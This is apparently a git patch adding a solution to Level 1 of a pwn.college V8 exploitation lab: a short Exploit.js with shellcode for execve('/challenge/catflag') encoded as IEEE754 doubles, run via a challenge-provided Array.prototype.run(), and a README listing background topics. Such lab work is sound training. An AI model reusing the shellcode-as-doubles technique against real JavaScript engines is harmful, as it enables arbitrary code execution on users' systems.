From 409a2d60cd51b531c893a4d9a97c45aceb2505d4 Mon Sep 17 00:00:00 2001
From: Jack Ren <admin@renjikai.com>
Date: Sat, 7 Sep 2024 10:12:57 +0800
Subject: [PATCH] Level 1 of PwnCollegeV8Exploitation

---
 .../Level1/Exploit.js                         |  3 +++
 .../PwnCollegeV8Exploitation/Level1/README.md | 20 +++++++++++++++++++
 2 files changed, 23 insertions(+)
 create mode 100644 JavaScript/PwnCollegeV8Exploitation/Level1/Exploit.js
 create mode 100644 JavaScript/PwnCollegeV8Exploitation/Level1/README.md

diff --git a/JavaScript/PwnCollegeV8Exploitation/Level1/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level1/Exploit.js
new file mode 100644
index 0000000..93254a9
--- /dev/null
+++ b/JavaScript/PwnCollegeV8Exploitation/Level1/Exploit.js
@@ -0,0 +1,3 @@
+// Machine code of `execve("/challenge/catflag", NULL, NULL)` in its IEEE754 double representation form
+let shellcode = [-4.658816580787966e+166, -8.593999715215021e+185, 2.820972645905851e-134, 3.0758087950517603e+180, 2.2354425876138794e+40, 3.68572438550025e+180, 1.0803082663212642e+117, -9.2559631348734e+61];
+shellcode.run();
\ No newline at end of file
diff --git a/JavaScript/PwnCollegeV8Exploitation/Level1/README.md b/JavaScript/PwnCollegeV8Exploitation/Level1/README.md
new file mode 100644
index 0000000..a9dc190
--- /dev/null
+++ b/JavaScript/PwnCollegeV8Exploitation/Level1/README.md
@@ -0,0 +1,20 @@
+# Level 1
+
+## Problem
+
+Directly execute amd64 machine code by calling `run()` on an array receiver.
+
+The array should have elements kind `PACKED_DOUBLE_ELEMENTS`.
+
+The `run()` is installed on `Array.prototype`.
+
+## Key Knowledge
+
+- [Inheritance and the prototype chain in JavaScript](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Inheritance_and_the_prototype_chain)
+- `Receiver` Object
+    - [How to understand sender and receiver in Ruby?](https://stackoverflow.com/questions/15592268/how-to-understand-sender-and-receiver-in-ruby)
+    - [Could you explain sender and receiver in OOP and give examples?](https://stackoverflow.com/questions/45474802/could-you-explain-sender-and-receiver-in-oop-and-give-examples)
+- [Elements Kinds in V8](https://v8.dev/blog/elements-kinds)
+- IEEE754 Standard
+    - Conversion between double & int64 representation using IEEE754
+- ShellCode